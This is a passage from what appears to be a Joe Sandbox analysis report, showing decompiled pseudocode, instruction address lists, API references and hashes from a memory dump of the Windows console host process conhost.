				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec8055;
				_t1724 =  *((intOrPtr*)(_t1723 + 0x18));
				if ( *_t1724 == 0x48) goto 0x7eecac81;
				_t1432 = (_t1430 << 5) + _t1781;
				_t1561 = (_t1448 << 5) + _t1781;
				r8d = _t1647 - 0x1c;
				_t1290 = r8d - 0x35;
				if (_t1290 > 0) goto 0x7eec8219;
				asm("dec ebp");
				if (_t1290 >= 0) goto 0x7eec8219;
				if (r13d == 4) goto 0x7eec7e20;
				 *((long long*)(_t1448 + 0x128)) = _t1561;
				r13d = r13d + 1;
				_t1562 = _t1561 + 0x20;
				 *((long long*)(_t1562 - 0x20)) =  *_t1432;
				 *((long long*)(_t1562 - 0x18)) =  *((intOrPtr*)(_t1432 + 8));
				 *((long long*)(_t1562 - 0x10)) =  *((intOrPtr*)(_t1432 + 0x10));
				 *((long long*)(_t1562 - 0x20)) = _t1432;
				_t1433 = _t1432 + 0x20;
				 *((long long*)(_t1562 - 8)) =  *((intOrPtr*)(_t1432 + 0x18));
				 *((long long*)(_t1433 - 0x18)) = _t1724;
				 *((intOrPtr*)(_t1433 - 0x10)) = 0;
				 *((long long*)(_t1433 - 8)) = _t1902;
				if ( *((intOrPtr*)(_t1724 + 0x10)) != 0) goto 0x7eeca880;
				goto 0x7eec7e20;
				asm("o16 nop [eax+eax]");
				_t897 =  *(_t1448 + 0x158);
				if (_t897 <= 0) goto 0x7eecada6;
				_t1652 =  *((intOrPtr*)(_t1448 + 0x150));
				goto 0x7eeca935;
				_t1653 = _t1652 + 0x10;
				if ((_t897 << 4) + _t1652 == _t1653) goto 0x7eecada6;
				if (_t1893 !=  *_t1653) goto 0x7eeca928;
				_t1903 =  *((intOrPtr*)(_t1448 + 0x148));
				_t1437 = _t1903;
				if (_t1903 != 0) goto 0x7eeca967;
				goto 0x7eecac4d;
				if (_t1903 == _t1437) goto 0x7eeca95a;
				if (_t1562 == _t1756) goto 0x7eeca96f;
				_t1438 =  *((intOrPtr*)(_t1437 + 8));
				if (_t1438 == 0) goto 0x7eecac4d;
				if ( *_t1438 != _t1893) goto 0x7eeca950;
				E00007FF67FF67EEC47D0(_t1448, _t1893);
				if (_t1438 == 0) goto 0x7eec7e20;
				if ( *_t1438 != 0x2f) goto 0x7eec7fb9;
				if ( *((intOrPtr*)(_t1448 + 0x13c)) < 0) goto 0x7eec9fe6;
				E00007FF67FF67EEC45D0( *((intOrPtr*)(_t1448 + 0x13c)), _t1438);
				if (_t1438 == 0) goto 0x7eecae81;
				goto 0x7eec7fb9;
				r9d =  *(_t1756[0x18]);
				if (r9d != 0) goto 0x7eec803e;
				if (r10d == 0x3e) goto 0x7eecaf06;
				E00007FF67FF67EECAF30(_t1448, _t1756[0x18]);
				if (( *_t1756 & 0x000000ff) - 2 - 4 > 0) goto 0x7eec7e2a;
				goto __rax;
			}

0x7ff67eec869b
0x7ff67eec86a8
0x7ff67eec86ab
0x7ff67eec86b2
0x7ff67eec86c3
0x7ff67eec86cd
0x7ff67eec86da
0x7ff67eec86e5
0x7ff67eec86e7
0x7ff67eec86f3
0x7ff67eec86fb
0x7ff67eec8705
0x7ff67eec8709
0x7ff67eec8710
0x7ff67eec871f
0x7ff67eec872d
0x7ff67eec8734
0x7ff67eec8737
0x7ff67eec8744
0x7ff67eec8754
0x7ff67eec875f
0x7ff67eec876b
0x7ff67eec8773
0x7ff67eec877d
0x7ff67eec8781
0x7ff67eec8788
0x7ff67eec8797
0x7ff67eec879e
0x7ff67eec87a5
0x7ff67eec87ac
0x7ff67eec87af
0x7ff67eec87bc
0x7ff67eec87d9
0x7ff67eec87de
0x7ff67eec87e5
0x7ff67eec87e7
0x7ff67eec87f3
0x7ff67eec87fb
0x7ff67eec8805
0x7ff67eec8809
0x7ff67eec8810
0x7ff67eec881c
0x7ff67eec881f
0x7ff67eec8826
0x7ff67eec882d
0x7ff67eec8837
0x7ff67eec8844
0x7ff67eec8851
0x7ff67eec8857
0x7ff67eec885f
0x7ff67eec8861
0x7ff67eec8866
0x7ff67eec8875
0x7ff67eec8877
0x7ff67eec887b
0x7ff67eec8882
0x7ff67eec8887
0x7ff67eec888c
0x7ff67eec8892
0x7ff67eec889e
0x7ff67eec88a0
0x7ff67eec88a6
0x7ff67eec88ac
0x7ff67eec88bd
0x7ff67eec88c5
0x7ff67eec88c7
0x7ff67eec88d5
0x7ff67eec88d7
0x7ff67eec88e3
0x7ff67eec88e7
0x7ff67eec88eb
0x7ff67eec88f5
0x7ff67eec88f9
0x7ff67eec8900
0x7ff67eec8908
0x7ff67eec890c
0x7ff67eec891a
0x7ff67eec8921
0x7ff67eec8924
0x7ff67eec8931
0x7ff67eec8941
0x7ff67eec894c
0x7ff67eec8953
0x7ff67eec895b
0x7ff67eec8965
0x7ff67eec8969
0x7ff67eec8970
0x7ff67eec897f
0x7ff67eec898d
0x7ff67eec8994
0x7ff67eec8997
0x7ff67eec89a4
0x7ff67eec89b4
0x7ff67eec89bf
0x7ff67eec89cb
0x7ff67eec89d3
0x7ff67eec89dd
0x7ff67eec89e1
0x7ff67eec89e8
0x7ff67eec89f7
0x7ff67eec8a05
0x7ff67eec8a0c
0x7ff67eec8a0f
0x7ff67eec8a1c
0x7ff67eec8a2c
0x7ff67eec8a37
0x7ff67eec8a43
0x7ff67eec8a4b
0x7ff67eec8a55
0x7ff67eec8a59
0x7ff67eec8a60
0x7ff67eec8a6f
0x7ff67eec8a7d
0x7ff67eec8a84
0x7ff67eec8a87
0x7ff67eec8a94
0x7ff67eec8aa4
0x7ff67eec8aaf
0x7ff67eec8abb
0x7ff67eec8ac3
0x7ff67eec8acd
0x7ff67eec8ad1
0x7ff67eec8ad8
0x7ff67eec8ae7
0x7ff67eec8af5
0x7ff67eec8afc
0x7ff67eec8aff
0x7ff67eec8b0c
0x7ff67eec8b1c
0x7ff67eec8b27
0x7ff67eec8b33
0x7ff67eec8b3b
0x7ff67eec8b45
0x7ff67eec8b49
0x7ff67eec8b50
0x7ff67eec8b5f
0x7ff67eec8b6d
0x7ff67eec8b74
0x7ff67eec8b77
0x7ff67eec8b84
0x7ff67eec8b94
0x7ff67eec8b9f
0x7ff67eec8bab
0x7ff67eec8bb3
0x7ff67eec8bbd
0x7ff67eec8bc1
0x7ff67eec8bc8
0x7ff67eec8bd7
0x7ff67eec8bde
0x7ff67eec8be5
0x7ff67eec8bef
0x7ff67eec8bfc
0x7ff67eec8c0c
0x7ff67eec8c21
0x7ff67eec8c39
0x7ff67eec8c51
0x7ff67eec8c5e
0x7ff67eec8c84
0x7ff67eec8c8a
0x7ff67eec8c98
0x7ff67eec8cb9
0x7ff67eec8ccc
0x7ff67eec8cde
0x7ff67eec8ce2
0x7ff67eec8ce7
0x7ff67eec8cee
0x7ff67eec8cf4
0x7ff67eec8cfc
0x7ff67eec8d0e
0x7ff67eec8d2a
0x7ff67eec8d37
0x7ff67eec8d3c
0x7ff67eec8d45
0x7ff67eec8d53
0x7ff67eec8d63
0x7ff67eec8d6a
0x7ff67eec8d84
0x7ff67eec8d87
0x7ff67eec8d8e
0x7ff67eec8d8f
0x7ff67eec8da6
0x7ff67eec8db1
0x7ff67eec8dbb
0x7ff67eec8dc3
0x7ff67eec8dcd
0x7ff67eec8dd1
0x7ff67eec8dd8
0x7ff67eec8de7
0x7ff67eec8df5
0x7ff67eec8dfc
0x7ff67eec8dff
0x7ff67eec8e0c
0x7ff67eec8e1c
0x7ff67eec8e27
0x7ff67eec8e33
0x7ff67eec8e3b
0x7ff67eec8e45
0x7ff67eec8e49
0x7ff67eec8e50
0x7ff67eec8e5f
0x7ff67eec8e6d
0x7ff67eec8e77
0x7ff67eec8e84
0x7ff67eec8e8b
0x7ff67eec8e8d
0x7ff67eec8e91
0x7ff67eec8e93
0x7ff67eec8e99
0x7ff67eec8ea8
0x7ff67eec8eaf
0x7ff67eec8eb2
0x7ff67eec8eb7
0x7ff67eec8ec4
0x7ff67eec8ece
0x7ff67eec8ed5
0x7ff67eec8ed9
0x7ff67eec8eec
0x7ff67eec8f05
0x7ff67eec8f1c
0x7ff67eec8f27
0x7ff67eec8f33
0x7ff67eec8f39
0x7ff67eec8f46
0x7ff67eec8f50
0x7ff67eec8f57
0x7ff67eec8f5f
0x7ff67eec8f63
0x7ff67eec8f6e
0x7ff67eec8f7a
0x7ff67eec8f80
0x7ff67eec8f8d
0x7ff67eec8f97
0x7ff67eec8f9e
0x7ff67eec8fa2
0x7ff67eec8fa9
0x7ff67eec8fb0
0x7ff67eec8fc3
0x7ff67eec8fce
0x7ff67eec8fd3
0x7ff67eec8fdb
0x7ff67eec8fe5
0x7ff67eec8fe9
0x7ff67eec8ff0
0x7ff67eec8fff
0x7ff67eec900d
0x7ff67eec9014
0x7ff67eec9017
0x7ff67eec9024
0x7ff67eec9034
0x7ff67eec903f
0x7ff67eec904b
0x7ff67eec9053
0x7ff67eec905d
0x7ff67eec9061
0x7ff67eec9068
0x7ff67eec9077
0x7ff67eec9085
0x7ff67eec908c
0x7ff67eec908f
0x7ff67eec909c
0x7ff67eec90ac
0x7ff67eec90b7
0x7ff67eec90c3
0x7ff67eec90cb
0x7ff67eec90d5
0x7ff67eec90d9
0x7ff67eec90e0
0x7ff67eec90ef
0x7ff67eec90fd
0x7ff67eec9104
0x7ff67eec9107
0x7ff67eec9114
0x7ff67eec9124
0x7ff67eec912f
0x7ff67eec913b
0x7ff67eec9143
0x7ff67eec914d
0x7ff67eec9151
0x7ff67eec9158
0x7ff67eec9167
0x7ff67eec9175
0x7ff67eec917c
0x7ff67eec917f
0x7ff67eec918c
0x7ff67eec919c
0x7ff67eec91a7
0x7ff67eec91b3
0x7ff67eec91bb
0x7ff67eec91c5
0x7ff67eec91c9
0x7ff67eec91d0
0x7ff67eec91df
0x7ff67eec91ed
0x7ff67eec91f4
0x7ff67eec91f7
0x7ff67eec9204
0x7ff67eec9214
0x7ff67eec921f
0x7ff67eec922b
0x7ff67eec9233
0x7ff67eec923d
0x7ff67eec9241
0x7ff67eec9248
0x7ff67eec9257
0x7ff67eec9265
0x7ff67eec926c
0x7ff67eec926f
0x7ff67eec927c
0x7ff67eec928c
0x7ff67eec9297
0x7ff67eec92a3
0x7ff67eec92ab
0x7ff67eec92b5
0x7ff67eec92b9
0x7ff67eec92c0
0x7ff67eec92cf
0x7ff67eec92d6
0x7ff67eec92dd
0x7ff67eec92e4
0x7ff67eec92e7
0x7ff67eec92f4
0x7ff67eec9306
0x7ff67eec930b
0x7ff67eec9318
0x7ff67eec9322
0x7ff67eec9329
0x7ff67eec932d
0x7ff67eec9334
0x7ff67eec9340
0x7ff67eec9345
0x7ff67eec9352
0x7ff67eec935c
0x7ff67eec9363
0x7ff67eec9367
0x7ff67eec936e
0x7ff67eec9373
0x7ff67eec937a
0x7ff67eec9387
0x7ff67eec9399
0x7ff67eec93aa
0x7ff67eec93b1
0x7ff67eec93de
0x7ff67eec93e5
0x7ff67eec93f6
0x7ff67eec9406
0x7ff67eec9416
0x7ff67eec9422
0x7ff67eec9425
0x7ff67eec9437
0x7ff67eec9442
0x7ff67eec944b
0x7ff67eec9453
0x7ff67eec945d
0x7ff67eec9461
0x7ff67eec9468
0x7ff67eec9477
0x7ff67eec9485
0x7ff67eec948c
0x7ff67eec948f
0x7ff67eec949c
0x7ff67eec94a9
0x7ff67eec94b0
0x7ff67eec94c0
0x7ff67eec94c2
0x7ff67eec94cb
0x7ff67eec94cf
0x7ff67eec94d3
0x7ff67eec94dd
0x7ff67eec94e1
0x7ff67eec94e8
0x7ff67eec94f7
0x7ff67eec94fe
0x7ff67eec9505
0x7ff67eec950c
0x7ff67eec950f
0x7ff67eec951c
0x7ff67eec9530
0x7ff67eec9537
0x7ff67eec953c
0x7ff67eec9549
0x7ff67eec9553
0x7ff67eec955d
0x7ff67eec9565
0x7ff67eec9569
0x7ff67eec9570
0x7ff67eec9575
0x7ff67eec9582
0x7ff67eec958c
0x7ff67eec9593
0x7ff67eec9597
0x7ff67eec95aa
0x7ff67eec95b5
0x7ff67eec95b7
0x7ff67eec95c3
0x7ff67eec95cb
0x7ff67eec95d5
0x7ff67eec95d9
0x7ff67eec95e0
0x7ff67eec95ef
0x7ff67eec95fd
0x7ff67eec9604
0x7ff67eec9607
0x7ff67eec9614
0x7ff67eec9624
0x7ff67eec962f
0x7ff67eec963b
0x7ff67eec9643
0x7ff67eec964d
0x7ff67eec9651
0x7ff67eec9658
0x7ff67eec9667
0x7ff67eec9675
0x7ff67eec967c
0x7ff67eec967f
0x7ff67eec968c
0x7ff67eec969c
0x7ff67eec96a7
0x7ff67eec96b3
0x7ff67eec96bb
0x7ff67eec96c5
0x7ff67eec96c9
0x7ff67eec96d0
0x7ff67eec96df
0x7ff67eec96ed
0x7ff67eec96f4
0x7ff67eec96f7
0x7ff67eec9704
0x7ff67eec9714
0x7ff67eec971f
0x7ff67eec972b
0x7ff67eec9733
0x7ff67eec973d
0x7ff67eec9741
0x7ff67eec9748
0x7ff67eec9757
0x7ff67eec9765
0x7ff67eec976c
0x7ff67eec976f
0x7ff67eec977c
0x7ff67eec978c
0x7ff67eec9797
0x7ff67eec97a3
0x7ff67eec97ab
0x7ff67eec97b5
0x7ff67eec97b9
0x7ff67eec97c0
0x7ff67eec97cf
0x7ff67eec97dd
0x7ff67eec97e4
0x7ff67eec97e7
0x7ff67eec97f4
0x7ff67eec97fb
0x7ff67eec980b
0x7ff67eec9812
0x7ff67eec9817
0x7ff67eec981c
0x7ff67eec9824
0x7ff67eec9830
0x7ff67eec983b
0x7ff67eec9840
0x7ff67eec9845
0x7ff67eec984a
0x7ff67eec9857
0x7ff67eec985e
0x7ff67eec986c
0x7ff67eec9880
0x7ff67eec9883
0x7ff67eec988a
0x7ff67eec988b
0x7ff67eec989b
0x7ff67eec98a8
0x7ff67eec98ae
0x7ff67eec98b2
0x7ff67eec98b9
0x7ff67eec98bd
0x7ff67eec98cd
0x7ff67eec98d2
0x7ff67eec98d7
0x7ff67eec98de
0x7ff67eec98f5
0x7ff67eec98fc
0x7ff67eec9904
0x7ff67eec9909
0x7ff67eec990d
0x7ff67eec9910
0x7ff67eec9915
0x7ff67eec9917
0x7ff67eec9920
0x7ff67eec9927
0x7ff67eec992c
0x7ff67eec993a
0x7ff67eec993e
0x7ff67eec9943
0x7ff67eec994c
0x7ff67eec9954
0x7ff67eec995c
0x7ff67eec9960
0x7ff67eec9965
0x7ff67eec996a
0x7ff67eec9971
0x7ff67eec9978
0x7ff67eec997e
0x7ff67eec998c
0x7ff67eec999a
0x7ff67eec999f
0x7ff67eec99a4
0x7ff67eec99ae
0x7ff67eec99b7
0x7ff67eec99ca
0x7ff67eec99d0
0x7ff67eec99d9
0x7ff67eec99e0
0x7ff67eec99e8
0x7ff67eec99f3
0x7ff67eec99fe
0x7ff67eec9a04
0x7ff67eec9a0e
0x7ff67eec9a13
0x7ff67eec9a1b
0x7ff67eec9a25
0x7ff67eec9a29
0x7ff67eec9a30
0x7ff67eec9a3f
0x7ff67eec9a46
0x7ff67eec9a4d
0x7ff67eec9a54
0x7ff67eec9a57
0x7ff67eec9a64
0x7ff67eec9a6d
0x7ff67eec9a71
0x7ff67eec9a75
0x7ff67eec9a7b
0x7ff67eec9a81
0x7ff67eec9a88
0x7ff67eec9a8b
0x7ff67eec9a93
0x7ff67eec9a9b
0x7ff67eec9aa5
0x7ff67eec9aa9
0x7ff67eec9ab0
0x7ff67eec9abf
0x7ff67eec9acd
0x7ff67eec9ad7
0x7ff67eec9ae4
0x7ff67eec9aeb
0x7ff67eec9af9
0x7ff67eec9afc
0x7ff67eec9b01
0x7ff67eec9b0e
0x7ff67eec9b18
0x7ff67eec9b1f
0x7ff67eec9b23
0x7ff67eec9b2a
0x7ff67eec9b38
0x7ff67eec9b3d
0x7ff67eec9b42
0x7ff67eec9b50
0x7ff67eec9b54
0x7ff67eec9b5c
0x7ff67eec9b64
0x7ff67eec9b69
0x7ff67eec9b6f
0x7ff67eec9b8f
0x7ff67eec9b94
0x7ff67eec9b9b
0x7ff67eec9ba3
0x7ff67eec9bab
0x7ff67eec9bb5
0x7ff67eec9bb9
0x7ff67eec9bc0
0x7ff67eec9bcf
0x7ff67eec9bdd
0x7ff67eec9be7
0x7ff67eec9bf4
0x7ff67eec9bfb
0x7ff67eec9c09
0x7ff67eec9c10
0x7ff67eec9c14
0x7ff67eec9c19
0x7ff67eec9c20
0x7ff67eec9c22
0x7ff67eec9c2b
0x7ff67eec9c33
0x7ff67eec9c3d
0x7ff67eec9c41
0x7ff67eec9c48
0x7ff67eec9c57
0x7ff67eec9c65
0x7ff67eec9c6f
0x7ff67eec9c7c
0x7ff67eec9c83
0x7ff67eec9c89
0x7ff67eec9c8e
0x7ff67eec9c9c
0x7ff67eec9cab
0x7ff67eec9cb2
0x7ff67eec9cb8
0x7ff67eec9cc2
0x7ff67eec9ccb
0x7ff67eec9ccf
0x7ff67eec9cd3
0x7ff67eec9cdd
0x7ff67eec9ce1
0x7ff67eec9ce8
0x7ff67eec9cf7
0x7ff67eec9d05
0x7ff67eec9d0f
0x7ff67eec9d1c
0x7ff67eec9d23
0x7ff67eec9d2f
0x7ff67eec9d31
0x7ff67eec9d39
0x7ff67eec9d43
0x7ff67eec9d47
0x7ff67eec9d4e
0x7ff67eec9d5b
0x7ff67eec9d69
0x7ff67eec9d76
0x7ff67eec9d81
0x7ff67eec9d88
0x7ff67eec9d8d
0x7ff67eec9da0
0x7ff67eec9da7
0x7ff67eec9dab
0x7ff67eec9db0
0x7ff67eec9db7
0x7ff67eec9dbe
0x7ff67eec9dc3
0x7ff67eec9dc7
0x7ff67eec9dcb
0x7ff67eec9dd5
0x7ff67eec9dd9
0x7ff67eec9de0
0x7ff67eec9deb
0x7ff67eec9df9
0x7ff67eec9e03
0x7ff67eec9e10
0x7ff67eec9e17
0x7ff67eec9e2b
0x7ff67eec9e2f
0x7ff67eec9e37
0x7ff67eec9e3c
0x7ff67eec9e46
0x7ff67eec9e4c
0x7ff67eec9e53
0x7ff67eec9e5b
0x7ff67eec9e65
0x7ff67eec9e69
0x7ff67eec9e70
0x7ff67eec9e7c
0x7ff67eec9e8a
0x7ff67eec9e94
0x7ff67eec9ea1
0x7ff67eec9ea8
0x7ff67eec9eaa
0x7ff67eec9eb7
0x7ff67eec9ebd
0x7ff67eec9ec1
0x7ff67eec9ec8
0x7ff67eec9ecc
0x7ff67eec9ed3
0x7ff67eec9edb
0x7ff67eec9eea
0x7ff67eec9eee
0x7ff67eec9ef6
0x7ff67eec9efb
0x7ff67eec9f05
0x7ff67eec9f0b
0x7ff67eec9f13
0x7ff67eec9f17
0x7ff67eec9f1b
0x7ff67eec9f25
0x7ff67eec9f29
0x7ff67eec9f30
0x7ff67eec9f3d
0x7ff67eec9f40
0x7ff67eec9f4e
0x7ff67eec9f58
0x7ff67eec9f65
0x7ff67eec9f6c
0x7ff67eec9f79
0x7ff67eec9f7e
0x7ff67eec9f8c
0x7ff67eec9f95
0x7ff67eec9fa0
0x7ff67eec9fad
0x7ff67eec9fb3
0x7ff67eec9fb7
0x7ff67eec9fbe
0x7ff67eec9fc3
0x7ff67eec9fca
0x7ff67eec9fd8
0x7ff67eec9fde
0x7ff67eec9fe1
0x7ff67eec9ff1
0x7ff67eec9ffb
0x7ff67eec9ffe
0x7ff67eeca00c
0x7ff67eeca018
0x7ff67eeca01f
0x7ff67eeca034
0x7ff67eeca037
0x7ff67eeca03c
0x7ff67eeca041
0x7ff67eeca048
0x7ff67eeca050
0x7ff67eeca056
0x7ff67eeca05e
0x7ff67eeca068
0x7ff67eeca072
0x7ff67eeca078
0x7ff67eeca07c
0x7ff67eeca081
0x7ff67eeca089
0x7ff67eeca096
0x7ff67eeca0a3
0x7ff67eeca0ae
0x7ff67eeca0b7
0x7ff67eeca0bd
0x7ff67eeca0c5
0x7ff67eeca0d2
0x7ff67eeca0d8
0x7ff67eeca0e2
0x7ff67eeca0ec
0x7ff67eeca0ee
0x7ff67eeca0fa
0x7ff67eeca104
0x7ff67eeca111
0x7ff67eeca119
0x7ff67eeca11e
0x7ff67eeca128
0x7ff67eeca12e
0x7ff67eeca133
0x7ff67eeca13b
0x7ff67eeca145
0x7ff67eeca149
0x7ff67eeca150
0x7ff67eeca15c
0x7ff67eeca16a
0x7ff67eeca174
0x7ff67eeca181
0x7ff67eeca188
0x7ff67eeca191
0x7ff67eeca197
0x7ff67eeca19b
0x7ff67eeca1a2
0x7ff67eeca1a6
0x7ff67eeca1ad
0x7ff67eeca1c4
0x7ff67eeca1c8
0x7ff67eeca1d0
0x7ff67eeca1d8
0x7ff67eeca1de
0x7ff67eeca1e9
0x7ff67eeca1f3
0x7ff67eeca1fb
0x7ff67eeca205
0x7ff67eeca209
0x7ff67eeca210
0x7ff67eeca220
0x7ff67eeca22e
0x7ff67eeca238
0x7ff67eeca245
0x7ff67eeca24c
0x7ff67eeca250
0x7ff67eeca261
0x7ff67eeca26b
0x7ff67eeca278
0x7ff67eeca27f
0x7ff67eeca290
0x7ff67eeca29a
0x7ff67eeca2a7
0x7ff67eeca2ae
0x7ff67eeca2bf
0x7ff67eeca2c9
0x7ff67eeca2d6
0x7ff67eeca2dd
0x7ff67eeca2e9
0x7ff67eeca2ef
0x7ff67eeca301
0x7ff67eeca308
0x7ff67eeca30d
0x7ff67eeca314
0x7ff67eeca325
0x7ff67eeca332
0x7ff67eeca339
0x7ff67eeca347
0x7ff67eeca34d
0x7ff67eeca35a
0x7ff67eeca367
0x7ff67eeca373
0x7ff67eeca377
0x7ff67eeca386
0x7ff67eeca392
0x7ff67eeca398
0x7ff67eeca39f
0x7ff67eeca3a5
0x7ff67eeca3af
0x7ff67eeca3b6
0x7ff67eeca3ba
0x7ff67eeca3c1
0x7ff67eeca3c6
0x7ff67eeca3ca
0x7ff67eeca3d6
0x7ff67eeca3df
0x7ff67eeca3e7
0x7ff67eeca3e9
0x7ff67eeca3ee
0x7ff67eeca3f7
0x7ff67eeca400
0x7ff67eeca406
0x7ff67eeca410
0x7ff67eeca41c
0x7ff67eeca424
0x7ff67eeca435
0x7ff67eeca436
0x7ff67eeca437
0x7ff67eeca438
0x7ff67eeca441
0x7ff67eeca451
0x7ff67eeca456
0x7ff67eeca45d
0x7ff67eeca463
0x7ff67eeca46c
0x7ff67eeca475
0x7ff67eeca47f
0x7ff67eeca489
0x7ff67eeca497
0x7ff67eeca4a7
0x7ff67eeca4b1
0x7ff67eeca4bc
0x7ff67eeca4c6
0x7ff67eeca4cd
0x7ff67eeca4d1
0x7ff67eeca4d8
0x7ff67eeca4e4
0x7ff67eeca4e9
0x7ff67eeca4f9
0x7ff67eeca4fe
0x7ff67eeca503
0x7ff67eeca510
0x7ff67eeca51d
0x7ff67eeca529
0x7ff67eeca52d
0x7ff67eeca538
0x7ff67eeca53d
0x7ff67eeca54a
0x7ff67eeca554
0x7ff67eeca55b
0x7ff67eeca55f
0x7ff67eeca566
0x7ff67eeca56b
0x7ff67eeca57e
0x7ff67eeca584
0x7ff67eeca58f
0x7ff67eeca596
0x7ff67eeca5a7
0x7ff67eeca5b1
0x7ff67eeca5be
0x7ff67eeca5c5
0x7ff67eeca5d4
0x7ff67eeca5dc
0x7ff67eeca5eb
0x7ff67eeca5ef
0x7ff67eeca5f7
0x7ff67eeca602
0x7ff67eeca604
0x7ff67eeca60e
0x7ff67eeca613
0x7ff67eeca617
0x7ff67eeca61b
0x7ff67eeca625
0x7ff67eeca629
0x7ff67eeca630
0x7ff67eeca63b
0x7ff67eeca649
0x7ff67eeca653
0x7ff67eeca660
0x7ff67eeca667
0x7ff67eeca669
0x7ff67eeca670
0x7ff67eeca673
0x7ff67eeca678
0x7ff67eeca67c
0x7ff67eeca68d
0x7ff67eeca694
0x7ff67eeca6a1
0x7ff67eeca6a8
0x7ff67eeca6b9
0x7ff67eeca6c0
0x7ff67eeca6cd
0x7ff67eeca6d4
0x7ff67eeca6e5
0x7ff67eeca6ef
0x7ff67eeca6fc
0x7ff67eeca703
0x7ff67eeca714
0x7ff67eeca71e
0x7ff67eeca72b
0x7ff67eeca732
0x7ff67eeca73f
0x7ff67eeca750
0x7ff67eeca75a
0x7ff67eeca76b
0x7ff67eeca775
0x7ff67eeca782
0x7ff67eeca789
0x7ff67eeca796
0x7ff67eeca79b
0x7ff67eeca7ac
0x7ff67eeca7b6
0x7ff67eeca7c3
0x7ff67eeca7ca
0x7ff67eeca7d7
0x7ff67eeca7dc
0x7ff67eeca7e9
0x7ff67eeca7ee
0x7ff67eeca7ff
0x7ff67eeca809
0x7ff67eeca816
0x7ff67eeca81d
0x7ff67eeca82e
0x7ff67eeca838
0x7ff67eeca83e
0x7ff67eeca849
0x7ff67eeca850
0x7ff67eeca855
0x7ff67eeca85c
0x7ff67eeca87a
0x7ff67eeca87d
0x7ff67eeca882
0x7ff67eeca886
0x7ff67eeca88a
0x7ff67eeca890
0x7ff67eeca894
0x7ff67eeca89e
0x7ff67eeca8a7
0x7ff67eeca8ae
0x7ff67eeca8b2
0x7ff67eeca8b6
0x7ff67eeca8be
0x7ff67eeca8c6
0x7ff67eeca8ce
0x7ff67eeca8d2
0x7ff67eeca8d6
0x7ff67eeca8da
0x7ff67eeca8de
0x7ff67eeca8e9
0x7ff67eeca8f0
0x7ff67eeca8f2
0x7ff67eeca8f7
0x7ff67eeca900
0x7ff67eeca908
0x7ff67eeca90e
0x7ff67eeca91f
0x7ff67eeca928
0x7ff67eeca92f
0x7ff67eeca938
0x7ff67eeca93a
0x7ff67eeca944
0x7ff67eeca947
0x7ff67eeca949
0x7ff67eeca953
0x7ff67eeca958
0x7ff67eeca95a
0x7ff67eeca961
0x7ff67eeca96d
0x7ff67eeca975
0x7ff67eeca980
0x7ff67eeca98e
0x7ff67eeca99c
0x7ff67eeca9a2
0x7ff67eeca9ad
0x7ff67eeca9b5
0x7ff67eeca9be
0x7ff67eeca9c4
0x7ff67eeca9ce
0x7ff67eeca9df
0x7ff67eeca9ea
0x7ff67eeca9fe

APIs

strlen.MSVCRT ref: 00007FF67EECA119

Strings

}, xrefs: 00007FF67EECA1A6
this, xrefs: 00007FF67EEC86A1
{parm#, xrefs: 00007FF67EECA0F3

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 65c187f8d79714b52019703b39314c5e82b86a550aac95a9573a28d22a9da0c1
Instruction ID: 34de30463359c03a7b8ea0e55df5dac4fd89472507df7d52cf97ea10f4374dbf
Opcode Fuzzy Hash: 65c187f8d79714b52019703b39314c5e82b86a550aac95a9573a28d22a9da0c1
Instruction Fuzzy Hash: 7021EA73B5C68281E726DF2494003FC2B51EB65B94F484936DE4E4B758DFBC908AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC3590 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00007FF67FF67EEC3590(long long __rcx, long long __rdx) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				long long _v80;
				short _v86;
				short _v88;
				long long _v96;
				short _v102;
				char _v104;
				char _v112;
				signed int _t22;

				_v102 = 0x209;
				0x7eed66e8();
				_v96 = __rcx;
				_v86 = 0x209;
				_v104 = 0x412;
				0x7eed66e8();
				_v80 = __rdx;
				asm("pxor xmm0, xmm0");
				asm("movaps [esp+0x70], xmm0");
				_v88 = 0x824;
				_v72 = 0x30;
				_v64 = 0;
				_v48 = 0x40;
				_v56 =  &_v104;
				_v112 = 0;
				if (E00007FF67FF67EEC4100(0x30006,  &_v104,  &_v112,  &_v72) < 0) goto 0x7eec363d;
				_t22 = E00007FF67FF67EEC413F(0x30006,  &_v104, _v112,  &_v72);
				E00007FF67FF67EEC3FEF(0x30006,  &_v104, _v112,  &_v72);
				return  !_t22 >> 0x1f;
			}

0x7ff67eec35a4
0x7ff67eec35a9
0x7ff67eec35b6
0x7ff67eec35bd
0x7ff67eec35c2
0x7ff67eec35c7
0x7ff67eec35d6
0x7ff67eec35dd
0x7ff67eec35e1
0x7ff67eec35e8
0x7ff67eec35f7
0x7ff67eec35ff
0x7ff67eec3608
0x7ff67eec3610
0x7ff67eec3615
0x7ff67eec3625
0x7ff67eec3631
0x7ff67eec3642
0x7ff67eec3652

APIs

wcslen.MSVCRT ref: 00007FF67EEC35A9
wcslen.MSVCRT ref: 00007FF67EEC35C7

Strings

@, xrefs: 00007FF67EEC3608
0, xrefs: 00007FF67EEC35F7

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
